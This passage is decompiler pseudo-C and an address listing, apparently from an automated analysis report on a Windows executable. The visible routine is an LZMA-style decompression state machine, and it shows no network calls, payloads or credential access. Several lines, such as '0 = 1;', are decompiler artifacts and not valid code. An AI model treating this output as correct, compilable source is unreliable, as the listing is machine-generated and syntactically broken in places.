                                                                  							__ecx =  *(__ebp - 0x58);
                                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                                  							 *(__ebp - 0x30) = 8;
                                                                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                  							L130:
                                                                  							 *(__ebp - 0x58) = __eax;
                                                                  							 *(__ebp - 0x40) = 3;
                                                                  							goto L144;
                                                                  						case 0x14:
                                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                  							__eax =  *(__ebp - 0x80);
                                                                  							goto L140;
                                                                  						case 0x15:
                                                                  							__eax = 0;
                                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  							__al = __al & 0x000000fd;
                                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                  							goto L120;
                                                                  						case 0x16:
                                                                  							__eax =  *(__ebp - 0x30);
                                                                  							__eflags = __eax - 4;
                                                                  							if(__eax >= 4) {
                                                                  								_push(3);
                                                                  								_pop(__eax);
                                                                  							}
                                                                  							__ecx =  *(__ebp - 4);
                                                                  							 *(__ebp - 0x40) = 6;
                                                                  							__eax = __eax << 7;
                                                                  							 *(__ebp - 0x7c) = 0x19;
                                                                  							 *(__ebp - 0x58) = __eax;
                                                                  							goto L145;
                                                                  						case 0x17:
                                                                  							L145:
                                                                  							__eax =  *(__ebp - 0x40);
                                                                  							 *(__ebp - 0x50) = 1;
                                                                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                  							goto L149;
                                                                  						case 0x18:
                                                                  							L146:
                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                  								 *(__ebp - 0x88) = 0x18;
                                                                  								goto L170;
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x70);
                                                                  							__eax =  *(__ebp - 0xc);
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							_t484 = __ebp - 0x70;
                                                                  							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                  							__eflags =  *_t484;
                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							L148:
                                                                  							_t487 = __ebp - 0x48;
                                                                  							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                  							__eflags =  *_t487;
                                                                  							L149:
                                                                  							__eflags =  *(__ebp - 0x48);
                                                                  							if( *(__ebp - 0x48) <= 0) {
                                                                  								__ecx =  *(__ebp - 0x40);
                                                                  								__ebx =  *(__ebp - 0x50);
                                                                  								0 = 1;
                                                                  								__eax = 1 << __cl;
                                                                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                  								__eax =  *(__ebp - 0x7c);
                                                                  								 *(__ebp - 0x44) = __ebx;
                                                                  								goto L140;
                                                                  							}
                                                                  							__eax =  *(__ebp - 0x50);
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                  							__eax =  *(__ebp - 0x58);
                                                                  							__esi = __edx + __eax;
                                                                  							 *(__ebp - 0x54) = __esi;
                                                                  							__ax =  *__esi;
                                                                  							__edi = __ax & 0x0000ffff;
                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  								__cx = __ax;
                                                                  								__cx = __ax >> 5;
                                                                  								__eax = __eax - __ecx;
                                                                  								__edx = __edx + 1;
                                                                  								__eflags = __edx;
                                                                  								 *__esi = __ax;
                                                                  								 *(__ebp - 0x50) = __edx;
                                                                  							} else {
                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                  								0x800 = 0x800 - __edi;
                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                  								 *__esi = __cx;
                                                                  							}
                                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  								goto L148;
                                                                  							} else {
                                                                  								goto L146;
                                                                  							}
                                                                  						case 0x19:
                                                                  							__eflags = __ebx - 4;
                                                                  							if(__ebx < 4) {
                                                                  								 *(__ebp - 0x2c) = __ebx;
                                                                  								L119:
                                                                  								_t393 = __ebp - 0x2c;
                                                                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                  								__eflags =  *_t393;
                                                                  								L120:
                                                                  								__eax =  *(__ebp - 0x2c);
                                                                  								__eflags = __eax;
                                                                  								if(__eax == 0) {
                                                                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                  									goto L170;
                                                                  								}
                                                                  								__eflags = __eax -  *(__ebp - 0x60);
                                                                  								if(__eax >  *(__ebp - 0x60)) {
                                                                  									goto L171;
                                                                  								}
                                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                  								__eax =  *(__ebp - 0x30);
                                                                  								_t400 = __ebp - 0x60;
                                                                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                  								__eflags =  *_t400;
                                                                  								goto L123;
                                                                  							}
                                                                  							__ecx = __ebx;
                                                                  							__eax = __ebx;
                                                                  							__ecx = __ebx >> 1;
                                                                  							__eax = __ebx & 0x00000001;
                                                                  							__ecx = (__ebx >> 1) - 1;
                                                                  							__al = __al | 0x00000002;
                                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                                  							__eflags = __ebx - 0xe;
                                                                  							 *(__ebp - 0x2c) = __eax;
                                                                  							if(__ebx >= 0xe) {
                                                                  								__ebx = 0;
                                                                  								 *(__ebp - 0x48) = __ecx;
                                                                  								L102:
                                                                  								__eflags =  *(__ebp - 0x48);
                                                                  								if( *(__ebp - 0x48) <= 0) {
                                                                  									__eax = __eax + __ebx;
                                                                  									 *(__ebp - 0x40) = 4;
                                                                  									 *(__ebp - 0x2c) = __eax;
                                                                  									__eax =  *(__ebp - 4);
                                                                  									__eax =  *(__ebp - 4) + 0x644;
                                                                  									__eflags = __eax;
                                                                  									L108:
                                                                  									__ebx = 0;
                                                                  									 *(__ebp - 0x58) = __eax;
                                                                  									 *(__ebp - 0x50) = 1;
                                                                  									 *(__ebp - 0x44) = 0;
                                                                  									 *(__ebp - 0x48) = 0;
                                                                  									L112:
                                                                  									__eax =  *(__ebp - 0x40);
                                                                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                  										_t391 = __ebp - 0x2c;
                                                                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                  										__eflags =  *_t391;
                                                                  										goto L119;
                                                                  									}
                                                                  									__eax =  *(__ebp - 0x50);
                                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                  									__eax =  *(__ebp - 0x58);
                                                                  									__esi = __edi + __eax;
                                                                  									 *(__ebp - 0x54) = __esi;
                                                                  									__ax =  *__esi;
                                                                  									__ecx = __ax & 0x0000ffff;
                                                                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                  									__eflags =  *(__ebp - 0xc) - __edx;
                                                                  									if( *(__ebp - 0xc) >= __edx) {
                                                                  										__ecx = 0;
                                                                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                  										__ecx = 1;
                                                                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                  										__ebx = 1;
                                                                  										__ecx =  *(__ebp - 0x48);
                                                                  										__ebx = 1 << __cl;
                                                                  										__ecx = 1 << __cl;
                                                                  										__ebx =  *(__ebp - 0x44);
                                                                  										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                  										__cx = __ax;
                                                                  										__cx = __ax >> 5;
                                                                  										__eax = __eax - __ecx;
                                                                  										__edi = __edi + 1;
                                                                  										__eflags = __edi;
                                                                  										 *(__ebp - 0x44) = __ebx;
                                                                  										 *__esi = __ax;
                                                                  										 *(__ebp - 0x50) = __edi;
                                                                  									} else {
                                                                  										 *(__ebp - 0x10) = __edx;
                                                                  										0x800 = 0x800 - __ecx;
                                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                  										 *__esi = __dx;
                                                                  									}
                                                                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  										L111:
                                                                  										_t368 = __ebp - 0x48;
                                                                  										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                  										__eflags =  *_t368;
                                                                  										goto L112;
                                                                  									} else {
                                                                  										goto L109;
                                                                  									}
                                                                  								}
                                                                  								__ecx =  *(__ebp - 0xc);
                                                                  								__ebx = __ebx + __ebx;
                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                  								 *(__ebp - 0x44) = __ebx;
                                                                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                  									__ecx =  *(__ebp - 0x10);
                                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                  									__ebx = __ebx | 0x00000001;
                                                                  									__eflags = __ebx;
                                                                  									 *(__ebp - 0x44) = __ebx;
                                                                  								}
                                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  									L101:
                                                                  									_t338 = __ebp - 0x48;
                                                                  									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                  									__eflags =  *_t338;
                                                                  									goto L102;
                                                                  								} else {
                                                                  									goto L99;
                                                                  								}
                                                                  							}
                                                                  							__edx =  *(__ebp - 4);
                                                                  							__eax = __eax - __ebx;
                                                                  							 *(__ebp - 0x40) = __ecx;
                                                                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                  							goto L108;
                                                                  						case 0x1a:
                                                                  							L56:
                                                                  							__eflags =  *(__ebp - 0x64);
                                                                  							if( *(__ebp - 0x64) == 0) {
                                                                  								 *(__ebp - 0x88) = 0x1a;
                                                                  								goto L170;
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x68);
                                                                  							__al =  *(__ebp - 0x5c);
                                                                  							__edx =  *(__ebp - 8);
                                                                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                  							 *( *(__ebp - 0x68)) = __al;
                                                                  							__ecx =  *(__ebp - 0x14);
                                                                  							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                  							__eax = __ecx + 1;
                                                                  							__edx = 0;
                                                                  							_t192 = __eax %  *(__ebp - 0x74);
                                                                  							__eax = __eax /  *(__ebp - 0x74);
                                                                  							__edx = _t192;
                                                                  							goto L79;
                                                                  						case 0x1b:
                                                                  							goto L75;
                                                                  						case 0x1c:
                                                                  							while(1) {
                                                                  								L123:
                                                                  								__eflags =  *(__ebp - 0x64);
                                                                  								if( *(__ebp - 0x64) == 0) {
                                                                  									break;
                                                                  								}
                                                                  								__eax =  *(__ebp - 0x14);
                                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                                  									__eflags = __eax;
                                                                  								}
                                                                  								__edx =  *(__ebp - 8);
                                                                  								__cl =  *(__eax + __edx);
                                                                  								__eax =  *(__ebp - 0x14);
                                                                  								 *(__ebp - 0x5c) = __cl;
                                                                  								 *(__eax + __edx) = __cl;
                                                                  								__eax = __eax + 1;
                                                                  								__edx = 0;
                                                                  								_t414 = __eax %  *(__ebp - 0x74);
                                                                  								__eax = __eax /  *(__ebp - 0x74);
                                                                  								__edx = _t414;
                                                                  								__eax =  *(__ebp - 0x68);
                                                                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                  								__eflags =  *(__ebp - 0x30);
                                                                  								 *( *(__ebp - 0x68)) = __cl;
                                                                  								 *(__ebp - 0x14) = _t414;
                                                                  								if( *(__ebp - 0x30) > 0) {
                                                                  									continue;
                                                                  								} else {
                                                                  									goto L80;
                                                                  								}
                                                                  							}
                                                                  							 *(__ebp - 0x88) = 0x1c;
                                                                  							goto L170;
                                                                  					}
                                                                  				}
                                                                  			}













                                                                  0x00000000
                                                                  0x0040667f
                                                                  0x0040667f
                                                                  0x00406683
                                                                  0x0040673a
                                                                  0x0040673d
                                                                  0x00406749
                                                                  0x0040662a
                                                                  0x0040662a
                                                                  0x0040662d
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x004069a2
                                                                  0x004069a2
                                                                  0x004069a8
                                                                  0x004069ae
                                                                  0x004069b4
                                                                  0x004069ce
                                                                  0x004069d1
                                                                  0x004069d7
                                                                  0x004069e2
                                                                  0x004069e4
                                                                  0x004069b6
                                                                  0x004069b6
                                                                  0x004069c5
                                                                  0x004069c9
                                                                  0x004069c9
                                                                  0x004069ee
                                                                  0x00406a15
                                                                  0x00406a15
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x00000000
                                                                  0x004069f0
                                                                  0x004069f0
                                                                  0x004069f4
                                                                  0x00406ba3
                                                                  0x00000000
                                                                  0x00406ba3
                                                                  0x00406a00
                                                                  0x00406a07
                                                                  0x00406a0f
                                                                  0x00406a12
                                                                  0x00000000
                                                                  0x00406a12
                                                                  0x00406689
                                                                  0x0040668d
                                                                  0x00406bce
                                                                  0x00406bce
                                                                  0x00406bd1
                                                                  0x00406bd5
                                                                  0x00406bd5
                                                                  0x00406693
                                                                  0x00406699
                                                                  0x0040669c
                                                                  0x004066a0
                                                                  0x004066a3
                                                                  0x004066a7
                                                                  0x00406b6d
                                                                  0x00406bb9
                                                                  0x00406bc1
                                                                  0x00406bc8
                                                                  0x00406bca
                                                                  0x00000000
                                                                  0x00406bca
                                                                  0x004066ad
                                                                  0x004066b0
                                                                  0x004066b6
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066bb
                                                                  0x004066be
                                                                  0x004066c1
                                                                  0x004066c4
                                                                  0x004066c7
                                                                  0x004066ca
                                                                  0x004066cb
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066d0
                                                                  0x004066d3
                                                                  0x004066d6
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066dc
                                                                  0x004066de
                                                                  0x004066de
                                                                  0x004066e1
                                                                  0x004066e1
                                                                  0x004066e1
                                                                  0x004061b7
                                                                  0x004061b7
                                                                  0x004061c0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6
                                                                  0x00000000
                                                                  0x004061d1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061da
                                                                  0x004061dd
                                                                  0x004061e0
                                                                  0x004061e4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061ea
                                                                  0x004061ed
                                                                  0x004061ef
                                                                  0x004061f0
                                                                  0x004061f3
                                                                  0x004061f5
                                                                  0x004061f6
                                                                  0x004061f8
                                                                  0x004061fb
                                                                  0x00406200
                                                                  0x00406205
                                                                  0x0040620e
                                                                  0x00406221
                                                                  0x00406224
                                                                  0x00406230
                                                                  0x00406258
                                                                  0x0040625a
                                                                  0x00406268
                                                                  0x00406268
                                                                  0x0040626c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x0040625c
                                                                  0x0040625f
                                                                  0x00406260
                                                                  0x00406260
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x00406236
                                                                  0x0040623b
                                                                  0x0040623b
                                                                  0x00406244
                                                                  0x0040624c
                                                                  0x0040624f
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406272
                                                                  0x00406272
                                                                  0x00406276
                                                                  0x00406b22
                                                                  0x00000000
                                                                  0x00406b22
                                                                  0x0040627f
                                                                  0x0040628f
                                                                  0x00406292
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406298
                                                                  0x0040629c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040629e
                                                                  0x004062a4
                                                                  0x004062ce
                                                                  0x004062d4
                                                                  0x004062db
                                                                  0x00000000
                                                                  0x004062db
                                                                  0x004062aa
                                                                  0x004062ad
                                                                  0x004062b2
                                                                  0x004062b2
                                                                  0x004062bd
                                                                  0x004062c5
                                                                  0x004062c8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040630d
                                                                  0x00406313
                                                                  0x00406316
                                                                  0x00406323
                                                                  0x0040632b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004062e2
                                                                  0x004062e2
                                                                  0x004062e6
                                                                  0x00406b31
                                                                  0x00000000
                                                                  0x00406b31
                                                                  0x004062f2
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x00406300
                                                                  0x00406303
                                                                  0x00406306
                                                                  0x0040630b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406333
                                                                  0x00406335
                                                                  0x00406338
                                                                  0x004063a9
                                                                  0x004063ac
                                                                  0x004063af
                                                                  0x004063b6
                                                                  0x004063c0
                                                                  0x00000000
                                                                  0x004063c0
                                                                  0x0040633a
                                                                  0x0040633e
                                                                  0x00406341
                                                                  0x00406343
                                                                  0x00406346
                                                                  0x00406349
                                                                  0x0040634b
                                                                  0x0040634e
                                                                  0x00406350
                                                                  0x00406355
                                                                  0x00406358
                                                                  0x0040635b
                                                                  0x0040635f
                                                                  0x00406366
                                                                  0x00406369
                                                                  0x00406370
                                                                  0x00406374
                                                                  0x0040637c
                                                                  0x0040637c
                                                                  0x0040637c
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x00406380
                                                                  0x00406383
                                                                  0x004063a1
                                                                  0x004063a3
                                                                  0x00000000
                                                                  0x00406385
                                                                  0x00406385
                                                                  0x00406388
                                                                  0x0040638b
                                                                  0x0040638e
                                                                  0x00406390
                                                                  0x00406390
                                                                  0x00406390
                                                                  0x00406393
                                                                  0x00406396
                                                                  0x00406398
                                                                  0x00406399
                                                                  0x0040639c
                                                                  0x00000000
                                                                  0x0040639c
                                                                  0x00000000
                                                                  0x004065d2
                                                                  0x004065d6
                                                                  0x004065f4
                                                                  0x004065f7
                                                                  0x004065fe
                                                                  0x00406601
                                                                  0x00406604
                                                                  0x00406607
                                                                  0x0040660a
                                                                  0x0040660d
                                                                  0x0040660f
                                                                  0x00406616
                                                                  0x00406617
                                                                  0x00406619
                                                                  0x0040661c
                                                                  0x0040661f
                                                                  0x00406622
                                                                  0x00406622
                                                                  0x00406627
                                                                  0x00000000
                                                                  0x00406627
                                                                  0x004065d8
                                                                  0x004065db
                                                                  0x004065de
                                                                  0x004065e8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040663c
                                                                  0x00406640
                                                                  0x00406663
                                                                  0x00406666
                                                                  0x00406669
                                                                  0x00406673
                                                                  0x00406642
                                                                  0x00406642
                                                                  0x00406645
                                                                  0x00406648
                                                                  0x0040664b
                                                                  0x00406658
                                                                  0x0040665b
                                                                  0x0040665b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004066f0
                                                                  0x004066f4
                                                                  0x004066fb
                                                                  0x004066fe
                                                                  0x00406701
                                                                  0x0040670b
                                                                  0x00000000
                                                                  0x0040670b
                                                                  0x004066f6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406717
                                                                  0x0040671b
                                                                  0x00406722
                                                                  0x00406725
                                                                  0x00406728
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040672b
                                                                  0x0040672e
                                                                  0x00406731
                                                                  0x00406731
                                                                  0x00406734
                                                                  0x00406737
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004067d7
                                                                  0x004067d7
                                                                  0x004067db
                                                                  0x00406b79
                                                                  0x00000000
                                                                  0x00406b79
                                                                  0x004067e1
                                                                  0x004067e4
                                                                  0x004067e7
                                                                  0x004067eb
                                                                  0x004067ee
                                                                  0x004067f4
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f9
                                                                  0x004067fc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004063cc
                                                                  0x004063cc
                                                                  0x004063d0
                                                                  0x00406b3d
                                                                  0x00000000
                                                                  0x00406b3d
                                                                  0x004063d6
                                                                  0x004063d9
                                                                  0x004063dc
                                                                  0x004063e0
                                                                  0x004063e3
                                                                  0x004063e9
                                                                  0x004063eb
                                                                  0x004063eb
                                                                  0x004063eb
                                                                  0x004063ee
                                                                  0x004063f1
                                                                  0x004063f1
                                                                  0x004063f4
                                                                  0x004063f7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004063fd
                                                                  0x00406403
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406409
                                                                  0x00406409
                                                                  0x0040640d
                                                                  0x00406410
                                                                  0x00406413
                                                                  0x00406416
                                                                  0x00406419
                                                                  0x0040641a
                                                                  0x0040641d
                                                                  0x0040641f
                                                                  0x00406425
                                                                  0x00406428
                                                                  0x0040642b
                                                                  0x0040642e
                                                                  0x00406431
                                                                  0x00406434
                                                                  0x00406437
                                                                  0x00406453
                                                                  0x00406456
                                                                  0x00406459
                                                                  0x0040645c
                                                                  0x00406463
                                                                  0x00406467
                                                                  0x00406469
                                                                  0x0040646d
                                                                  0x00406439
                                                                  0x00406439
                                                                  0x0040643d
                                                                  0x00406445
                                                                  0x0040644a
                                                                  0x0040644c
                                                                  0x0040644e
                                                                  0x0040644e
                                                                  0x00406470
                                                                  0x00406477
                                                                  0x0040647a
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406485
                                                                  0x00406485
                                                                  0x00406489
                                                                  0x00406b49
                                                                  0x00000000
                                                                  0x00406b49
                                                                  0x0040648f
                                                                  0x00406492
                                                                  0x00406495
                                                                  0x00406499
                                                                  0x0040649c
                                                                  0x004064a2
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a7
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064b0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004064b2
                                                                  0x004064b5
                                                                  0x004064b8
                                                                  0x004064bb
                                                                  0x004064be
                                                                  0x004064c1
                                                                  0x004064c4
                                                                  0x004064c7
                                                                  0x004064ca
                                                                  0x004064cd
                                                                  0x004064d0
                                                                  0x004064e8
                                                                  0x004064eb
                                                                  0x004064ee
                                                                  0x004064f1
                                                                  0x004064f1
                                                                  0x004064f4
                                                                  0x004064f8
                                                                  0x004064fa
                                                                  0x004064d2
                                                                  0x004064d2
                                                                  0x004064da
                                                                  0x004064df
                                                                  0x004064e1
                                                                  0x004064e3
                                                                  0x004064e3
                                                                  0x004064fd
                                                                  0x00406504
                                                                  0x00406507
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00406507
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406549
                                                                  0x00406549
                                                                  0x0040654d
                                                                  0x00406b55
                                                                  0x00000000
                                                                  0x00406b55
                                                                  0x00406553
                                                                  0x00406556
                                                                  0x00406559
                                                                  0x0040655d
                                                                  0x00406560
                                                                  0x00406566
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x0040656b
                                                                  0x0040656e
                                                                  0x0040656e
                                                                  0x00406574
                                                                  0x00406512
                                                                  0x00406512
                                                                  0x00406515
                                                                  0x00000000
                                                                  0x00406515
                                                                  0x00406576
                                                                  0x00406576
                                                                  0x00406579
                                                                  0x0040657c
                                                                  0x0040657f
                                                                  0x00406582
                                                                  0x00406585
                                                                  0x00406588
                                                                  0x0040658b
                                                                  0x0040658e
                                                                  0x00406591
                                                                  0x00406594
                                                                  0x004065ac
                                                                  0x004065af
                                                                  0x004065b2
                                                                  0x004065b5
                                                                  0x004065b5
                                                                  0x004065b8
                                                                  0x004065bc
                                                                  0x004065be
                                                                  0x00406596
                                                                  0x00406596
                                                                  0x0040659e
                                                                  0x004065a3
                                                                  0x004065a5
                                                                  0x004065a7
                                                                  0x004065a7
                                                                  0x004065c1
                                                                  0x004065c8
                                                                  0x004065cb
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x0040685a
                                                                  0x0040685a
                                                                  0x0040685e
                                                                  0x00406b85
                                                                  0x00000000
                                                                  0x00406b85
                                                                  0x00406864
                                                                  0x00406867
                                                                  0x0040686a
                                                                  0x0040686e
                                                                  0x00406871
                                                                  0x00406877
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x0040687c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406969
                                                                  0x0040696d
                                                                  0x0040698f
                                                                  0x00406992
                                                                  0x0040699c
                                                                  0x00000000
                                                                  0x0040699c
                                                                  0x0040696f
                                                                  0x00406972
                                                                  0x00406976
                                                                  0x00406979
                                                                  0x00406979
                                                                  0x0040697c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a26
                                                                  0x00406a2a
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a4f
                                                                  0x00406a56
                                                                  0x00406a5d
                                                                  0x00406a5d
                                                                  0x00000000
                                                                  0x00406a5d
                                                                  0x00406a2c
                                                                  0x00406a2f
                                                                  0x00406a32
                                                                  0x00406a35
                                                                  0x00406a3c
                                                                  0x00406980
                                                                  0x00406980
                                                                  0x00406983
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406b17
                                                                  0x00406b1a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406751
                                                                  0x00406753
                                                                  0x0040675a
                                                                  0x0040675b
                                                                  0x0040675d
                                                                  0x00406760
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406768
                                                                  0x0040676b
                                                                  0x0040676e
                                                                  0x00406770
                                                                  0x00406772
                                                                  0x00406772
                                                                  0x00406773
                                                                  0x00406776
                                                                  0x0040677d
                                                                  0x00406780
                                                                  0x0040678e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a64
                                                                  0x00406a64
                                                                  0x00406a67
                                                                  0x00406a6e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a73
                                                                  0x00406a73
                                                                  0x00406a77
                                                                  0x00406baf
                                                                  0x00000000
                                                                  0x00406baf
                                                                  0x00406a7d
                                                                  0x00406a80
                                                                  0x00406a83
                                                                  0x00406a87
                                                                  0x00406a8a
                                                                  0x00406a90
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a95
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a9b
                                                                  0x00406a9b
                                                                  0x00406a9f
                                                                  0x00406aff
                                                                  0x00406b02
                                                                  0x00406b07
                                                                  0x00406b08
                                                                  0x00406b0a
                                                                  0x00406b0c
                                                                  0x00406b0f
                                                                  0x00000000
                                                                  0x00406b0f
                                                                  0x00406aa1
                                                                  0x00406aa7
                                                                  0x00406aaa
                                                                  0x00406aad
                                                                  0x00406ab0
                                                                  0x00406ab3
                                                                  0x00406ab6
                                                                  0x00406ab9
                                                                  0x00406abc
                                                                  0x00406abf
                                                                  0x00406ac2
                                                                  0x00406adb
                                                                  0x00406ade
                                                                  0x00406ae1
                                                                  0x00406ae4
                                                                  0x00406ae8
                                                                  0x00406aea
                                                                  0x00406aea
                                                                  0x00406aeb
                                                                  0x00406aee
                                                                  0x00406ac4
                                                                  0x00406ac4
                                                                  0x00406acc
                                                                  0x00406ad1
                                                                  0x00406ad3
                                                                  0x00406ad6
                                                                  0x00406ad6
                                                                  0x00406af1
